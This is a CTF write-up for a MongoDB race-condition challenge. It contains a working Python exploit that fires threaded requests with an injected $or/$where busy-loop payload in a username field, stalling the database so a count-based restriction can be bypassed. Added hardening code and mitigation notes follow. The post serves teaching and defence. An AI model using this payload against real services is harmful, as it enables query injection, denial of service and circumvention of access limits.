MongoDB Race Condition payload
Information
Target: MongoDB
Vulnerability: Race Condition
Desc
A MongoDB race condition attack that works by locking the database with a slow injected query.
Example
Code
```typescript
// admin.controller.ts
@Post('list')
async getFlagList(@Body() listDto: ListDto): Promise<FlagDocument[]> {
  return await this.adminService.getFlagList(listDto.username);
}
```
Exploit
```python
import threading
import requests  # missing from the original snippet

# Placeholders (assumed): the challenge base URL and the authenticated session header
url = "http://TARGET_PLACEHOLDER"
auth = {"Authorization": "AUTH_HEADER_PLACEHOLDER"}

# Logic Vulnerability - Database Lock
def lock():
    res = requests.post(f"{url}/admin/list", headers=auth,
        json={"username": '''admin", "$or": [{"dummy": "dummy"},{"$where": "date=new Date();do{cur=new Date();}while(cur-date<5000) + 1 || true"}], "":"'''})
    print(res.text)

threads = []
for i in range(10):
    thread = threading.Thread(target=lock)
    threads.append(thread)
    thread.start()

for thread in threads:
    thread.join()
```
While the injected queries are running, counting the existing documents in the DB takes a long time, so logic such as number restrictions (check-then-act on a count) can be bypassed.
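The post only shows the controller, not how the service turns `username` into a filter. The example below is added here (not the challenge's own code) and assumes the filter is assembled as text and parsed, which is one way a plain string can become a `$or`/`$where` clause; it also shows a hardened builder that type-checks and allowlists the value and constructs the filter as an object.

```typescript
// Added example, not from the original post. The string-concatenation
// query builder is an assumption about the vulnerable service.

type Query = Record<string, unknown>;

// Assumed vulnerable pattern: a quote inside the username closes the
// field value, so the rest of the string becomes filter structure.
function buildQueryUnsafe(username: string): Query {
  return JSON.parse(`{"username": "${username}"}`) as Query;
}

// Walks a filter recursively and reports whether any key is a MongoDB
// operator (e.g. $or, $where). Useful as a defensive check or a log signal.
function hasOperatorKey(value: unknown): boolean {
  if (Array.isArray(value)) {
    return value.some(hasOperatorKey);
  }
  if (value !== null && typeof value === "object") {
    const obj = value as Query;
    return Object.keys(obj).some(
      (k) => k.startsWith("$") || hasOperatorKey(obj[k]),
    );
  }
  return false;
}

// Hardened builder: reject anything that is not a string matching an
// allowlist, and build the filter as an object so the value is only data.
const USERNAME_RE = /^[A-Za-z0-9_.-]{1,32}$/;

function buildQuerySafe(username: unknown): Query {
  if (typeof username !== "string" || !USERNAME_RE.test(username)) {
    throw new Error("invalid username");
  }
  return { username };
}

// The username value from the post's exploit, constructed here for the check.
const PAYLOAD =
  'admin", "$or": [{"dummy": "dummy"},{"$where": "date=new Date();do{cur=new Date();}while(cur-date<5000) + 1 || true"}], "":"';
```

Even with validated input, `$where` is only a threat if server-side JavaScript is enabled; running `mongod` with `security.javascriptEnabled: false` (or `--noscripting`) removes that sink, and count-based limits should be enforced atomically rather than as a separate count followed by an insert.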
Comment
This is part of the solution for the challenge I made (for the dreamhack X-mas CTF).
Challenge Link
Ref
This post is licensed under CC BY 4.0 by the author.